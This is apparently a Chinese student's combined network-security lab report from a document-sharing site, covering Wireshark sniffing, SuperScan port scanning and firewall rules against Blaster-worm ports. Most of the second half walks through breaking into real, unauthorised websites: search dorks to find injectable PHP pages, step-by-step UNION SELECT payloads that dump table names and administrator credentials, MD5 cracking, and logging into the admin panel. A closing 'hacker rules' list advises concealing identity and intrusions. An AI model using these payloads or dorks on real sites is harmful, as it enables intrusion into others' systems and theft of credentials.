网络安全实验报告综合.pdf

《网络安全实验报告综合.pdf》由会员分享，可在线阅读，更多相关《网络安全实验报告综合.pdf（34页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、网络扫描与网络嗅探网络扫描与网络嗅探一一实验目的实验目的（1）理解网络嗅探和扫描器的工作机制和作用（2）使用抓包与协议分析工具 Wireshark（3）掌握利用扫描器进行主动探测，收集目标信息的方法（4）掌握使用漏洞扫描器检测远程或本地主机安全性漏洞二二实验环境实验环境Windowsxp 操作系统平台，局域网环境，网 络抓包与协 议分析 工具Wireshark，扫描器软件：Superscan三三 实验步骤实验步骤使用 Wireshark 抓包并进行协议分析（1）下载并安装软件，主界面如图 1所示。图 1（2）单击 capture，打开 interface接口选项，选择本地连接，如图 2 所示。

2、图 2（3）使用 Wireshark数据报获取，抓取 TCP 数据包并进行分析从抓取的数据包来看,首先关于本次分析的数据包是典型的 TCP 三次握手,如图 3 所示。图 3（4）TCP 三次握手过程分析（以第一次握手为例）主机（）发送一个连接请求到（），第一个 TCP 包的格式如图 4 所示。图 4第三行是ipv4的报文,网际协议IP是工作在网络层,也就是数据链路层的上层,IPv4报文中的源地址和目的地址是 ip 地址,版本号 TCP 是 6，其格式为如图 5所示。图 5第四行是TCP报文,从上面两个可以知道,这个TCP包被层层包装,经过下面一层就相应的包装一层,第三段是经过传输层的数据,TC

3、P 报文的格式为如图 6 所示。图 6TCP 的源端口 2804 也就是宿主机建立连接开出来的端口,目的端口 8080。Sequence number同步序号，这里是 0 x3a 2a b7 bb,但这里显示的是相对值 0。Acknowledgment number确认序号 4bytes,为 0,因为还是第一个握手包。Header Length头长度 28 字节,滑动窗口 65535 大小字节,校验和,紧急指针为 0。Options 选项 8字节使用 superscan 扫描（1）下载并安装，如图 7所示。图 7（2）主界面如图 8所示。图 8（3）使用 superscan 对远程主机和本地主

4、机进行端口扫描通过 ping来检验 IP是否在线：ping，显示结果如图 9、图 10 所示。图 9图 10（4）单击 port list setup进入如图 11 所示。图 11（5）软件自带一个木马端口列表，通过这个列表我们可以检测目标计算机是否有木马，如图 12 所示。图 12四四 实验总结实验总结通过本次实验，我理解了网络嗅探的工作机制和作用，它可以用来窃听计算机在网络上所产生的众多的信息，可以窃听计算机程序在网络上发送和接收到的数据，用来接收在网络上传输的信息，并且掌握了常用的网络抓包与协议分析工具 Wireshark的使用方法。同时也掌握了扫描器的工作机制和作用，以及利用扫描器进行

5、主动探测，收集目标信息的方法。防火墙配置与应用实验防火墙配置与应用实验一、实验目的一、实验目的掌握一般软件防火墙的使用与配置。二、实验环境二、实验环境多台装有 Windows XP的计算机。提供防火墙软件（）。三、实验原理三、实验原理在计算机系统上，软件防火墙本身需要具有较高的抗攻击能力，一般设置于系统和网络协议的底层。访问与被访问的端口被设置严格的访问规则，以切断一切规则以外的网络连接。防火墙的安全防护性能是由防火墙、用户设置的规则和计算机系统本身共同保证的。四、实验要求四、实验要求在防火墙中监听各个应用程序使用端口的情况，即查看哪些程序使用了端口，使用哪个端口，是否存在可疑程序在使用网络资

6、源。能够根据要求，自定义 IP 规则打开某些端口，使特定的应用程序正常使用。能够根据要求，自定义 IP规则封锁某些端口，以此禁止某些 IP访问自己的计算机，从而达到安全的目的。五、实验步骤（以天网防火墙为例）五、实验步骤（以天网防火墙为例）1)首先安装并打开天网防火墙。下面来介绍天网的一些简单设置，如图1 所示是系统设置界面，可以参照此来设置。图 12)定义 IP规则，这里是采用默认情况，如图 2所示。图 23)下图是各个应用程序使用端口的情况，如图 3所示。图 3（4）下图就是日志，上面记录了程序访问网络的记录，局域网和互联网上被 IP扫描端口的情况，如图 4所示。图 4天网防火墙会把所有不

7、合规则的数据包拦截并记录到日志中，如果选择了监视所有 TCP 和 UDP 数据包，那发送和接收的每个数据包都将被记录。如139端口攻击，139 端口是 NetBIOS协议所使用的端口，在安装了 TCP/IP 协议的同时，NetBIOS 也会被作为默认设置安装到系统中。(5)防火墙开放端口应用,打开 68816889端口。建立新的 IP规则，如下图，在自定义IP规则里双击进行新规则设置，如图5所示。图 5 设置新规则后，把规则上移到该协议组的置顶，并保存。然后可以进行在线端口测试，这些端口是否已经开放的，如图 6 所示。图 6(6)应用自定义规则防止常见病毒。下面是防范冲击波病毒的实例应用，冲击

8、波就是利用 WINDOWS 系统的 RPC 服务漏洞以及开放的 69、135、139、445、4444端口入侵。图 7就是禁止 4444 端口的示意图。图 7 封锁 69 端口，如图 8 所示。图 8 建立完后就保存，保存完后就可以防范冲击波病毒了。六、实验总结六、实验总结通过本次实验，我知道了一般软件防火墙的使用与配置。可以使用该软件监听各个应用程序使用端口的情况，查看哪些程序使用了端口，使用哪个端口，是否存在可疑程序在使用网络资源。通过新建 IP 规则，并且进行自定义，对某些端口进行封锁，以禁止某些 IP 访问自己的计算机，之后保存，可以通过此方法来保证计算机的安全。某网站重置密码漏洞及攻

9、击实例某网站重置密码漏洞及攻击实例一一实验目的实验目的（1）理解网站攻击原理（2）理解网络攻击时使用工具的原理（3）熟练使用网站攻击工具二二实验环境实验环境操作系统：Windows 8解密工具：MD5检测工具：啊 D浏览器：2345 王牌浏览器三三 实验步骤实验步骤（1）寻找可以注入网站网址：使用检测工具，啊 D扫描注入点，显示如图 1所示。图 1（3）SQL注册检测，扫描表段，显示结果如图2所示。图 2（4）从表段检测字段，检测结果如图3所示。图 3（4）进一步检测内容，检测结果如图4所示。图 4（5）对密码的密文进行 MD5解密，使用链接：或者，解密结果显示如图5所示。图 5（6）还礼入口

10、检测，找到管理员登陆的网页链接，如图6 所示。图 6（7）打开链接输入“用户名称”和“用户密码”点击“确认”即可，如图7所示。图 7（8）登陆后台显示如图8所示。图 8（9）找到修改密码，即可重置管理员密码，显示界面如图9 所示。但是极不建议你修改网站里面的任何内容。图 9四四 实验总结实验总结通过本次试验我深如理解了对网站攻击的原理，对网络安全有了进一步的认识，以后如果自己建立网站，一定要多检测，多验证，保证网站的安全性。我体会到理论与实践结合是相当重要的，要真正的掌握一门学问和技术，仅仅靠书本上的知识是远远不够的，必须要从书本上升到实践，把理论融合到实践中去。这次实验，在很多方面我得到了提

11、升，尤其是单独解决问题的能力。从这一点我深刻的认识到，我们一定要有一种能独立面对困难，挫折的能力，这样才能在陌生的领域中可以得到更好的发展的能力。SQLSQL 注入实例注入实例如果你想要入侵一个网站，那么你首先要知道你将要入侵的网站是哪一种类型的。方法是：打开一个网页，右键属性，从“地址（URL）”查看网站属于哪种类型。有五种类型的网站页面 URL标准。相关文档：演示实例是基于 PHP 类型的网站（一种在服务器端执行的嵌入 HTML文档的脚本语言，主要用来连接动态数据库、制作动态网站。现在被很多网站编程人员广泛运用）地址：如果你想要试验一次，但是这个网站已经不能被修复的话，那么你可以搜索类似的

12、网站。搜索语句可以是：inurl:id=或 inurl:id=下面是我找的一个例子，供大家参考：实验演示：实验演示：第一步：寻找可以入侵的网站。第一步：寻找可以入侵的网站。方法是：打开 PHP 类型的网址，在注入点后加一个单引号（）按回车。如果网页出错，那么该网站有漏洞。下面是我选的网站的截图比较，正常网页如图 1所示，加()出现的错误网页如图 2 所示。图 1图 2第二步：进一步验证此链接是可以注入的。第二步：进一步验证此链接是可以注入的。（与运算）（与运算）（1）在注入点后加“+and+1=1”页面显示正常，如图 3所示。图 3（2）在注入点后加“+and+1=0”，页面显示错误，如图 4

13、所示。图 4第三步：获得字段数在注入点后面加入“+order+by+1”，页面显示正常，如图 5所示。图 5（2）注入点后面换成“+order+by+20”，出现错误界面，如图 6 所示。图 6（3）用二分法进一步判断出现错误的字段数，再注入点后面换成：“+order+by+10”，“+order+by+5”，“+order+by+8”，“+order+by+9”，页面均显示正常，说明，正确的字段是 1,2,3,4,5,6,7,8,9。如图 7 所示。图 7第四步：获得显示位再注入点后面加入“+and+1=2+union+select+1,2,3,4,5,6,7,8,9”，如图 8 所示，显示

14、的数字即是显示位：2，4，7图 8第五步：获得该网站数据库的名字、版本、数据库所在路径等下面是获得数据库信息的一些函数：user()数据库用户名database()当前使用的数据库名version()数据库版本datadir()或datadir数据库数据所在路径basedir()或basedir数据库安装路径在出错的字段位置加上上面的函数，即可获得相对应的信息，如图 9所示图 9第六步：第六步：获得当前使用的数据库名的获得当前使用的数据库名的 hexhex 值，值，并暴漏该网站数据库的并暴漏该网站数据库的字段名字段名（1）数据库名的还原需要使用协助工具：小葵多功能转换工具，把当前使用的数据库名

15、 jmjt 转化为：0 x6A6D6A74，转换结果如图 10 所示。图 10（2）注入点后面加下面的公式获得数据库的字段名：“+and+1=2+union+select+1,GROUP_CONCAT(DISTINCT+table_name),3,4,5,6,7,8,9+from+where+table_schema=0 x6A6D6A74”（数据库表名的 hex 值）GROUP_CONCAT(DISTINCT+table_name)放在显示位即可获得相对应 SQL 数据库中的字段名，如图 11所示。报表中的具体字段显示如图 12。图 11图 12第七步：在所有的字段中找数据库管理员的用户名，

16、并获得第七步：在所有的字段中找数据库管理员的用户名，并获得 hexhex值值找到管理员的字段名（管理员：administrator）猜测：这个很显然就判断是useradmin（大多数），因为大多数人都是admin、user、Pass 等一些常用单词搭配一起标记。把管理员的字段名再次使用小葵多功能转换工具获得其 hex 值，如图 13 所示。图 13第八步：第八步：借助管理员用户名的借助管理员用户名的 hexhex 值，值，获得字段获得字段 useradminuseradmin的子字段的子字段注入点后面加下面公式获得管理员的子字段：“+and+1=2+union+select+1,concat(

17、GROUP_CONCAT(DISTINCT+column_name),3,4,5,6,7,8,9+from+where+table_name=0 x61646D696E”（管理员用户名的 hex值）concat(GROUP_CONCAT(DISTINCT+column_name)放在显示位获得的子字段显示如图 14所示。图 14第九步：从管理员的子字段中获得管理员的登陆账号和密码从上面的子字段中不难看出，子字段中有账号和密码，在注入点后面加上下面公式“+and+1=2+union+select+1,concat(Uname),3,concat(Upwd),5,6,7,8,9+from+user

18、admin”获得管理员的登录名和密码如图 15 所示。图 15第十步：进一步把十六进制显示的密码的密文进行解密使用下面的 MD5 解密工具的链接把密码的密文解密，使用网址：或者，把十六进制显示的密码的密文输入编辑查询框中进行查询，查询结果如图 16所示。图 16最后一步：使用“啊最后一步：使用“啊 D D”工具扫描后台，”工具扫描后台，（1）打开“啊 D”工具，点击“管理入口”进行扫描（2）找到管理员的登陆界面如图 17所示，输入账号和密码可进入该网站的后台如图 18 所示。图 17图 18这样就是成功入侵了一个网站！你可以上传图片、文章、视频等等。前台可以看到，这里我就不实现了。在后台你可以

19、对网站管理员进行密码重置设置，但是建议你不要这么做！入侵网站注意事项：入侵网站注意事项：1.不恶意破坏任何的系统，这样只会给你带来麻烦。恶意破坏他人的软件将导致法律责任，如果你只是使用电脑，那仅为非法使用！注意：千万不要破坏别人的软件或资料！2、不修改任何的系统档，如果你是为了要进入系统而修改它，请在达到目的后将它改回原状。3.不要轻易的将你要 hack的站台告诉你不信任的朋友。4.不要在 bbs 上谈论你 hack的任何事情。5.在 post 文章的时候不要使用真名。6.正在入侵的时候，不要随意离开你的电脑。7.不要在电话中谈论你 hack的任何事情。8.将你的笔记放在安全的地方。9.想要成

20、为 hack就要学好编程和数学，以及一些 TCPIP协议、系统原理、编译原理等知识！10.已侵入电脑中的帐号不得清除或涂改。11不得修改系统档案，如果为了隐藏自己的侵入而做的修改则不在此限，但仍须维持原来系统的安全性，不得因得到系统的控制权而将门户大开！12不将你已破解的帐号分享于你的朋友。13.不要侵入或破坏政府机关的主机。14.不会编程的黑客不是好黑客。15.黑客不同于“盗”16.最重要的一点，不要入侵有关政府的网站实验总结：实验总结：1、此次的课题研究让我了解了 SQL注入攻击的原理和过程，让我了解到了做这方面的时候需要注意的安全性问题，也意识到安全的重要性和数据库的一些缺点，提高了自己在这方面的安全意识。2、在实验的过程中遇到了很多困难，配置上的，环境上的，还有一些需要注意的小问题，而且从整个课题研究的过程来讲也涉及到了很多软件的配合使用。3、整个实验过程花费的时间还是不少，需要找可以注入的网站等，对于没有了解过网站的我来说还是有一定挑战性的，但整个实验的过程让我对网站中存在的安全产生了很大感兴趣。4、很高兴顺利完成了这次课题研究，期待下次能使用更高级的工具进行扫描实施攻击，以后的研究过程中也要特别注意这些脆弱点了。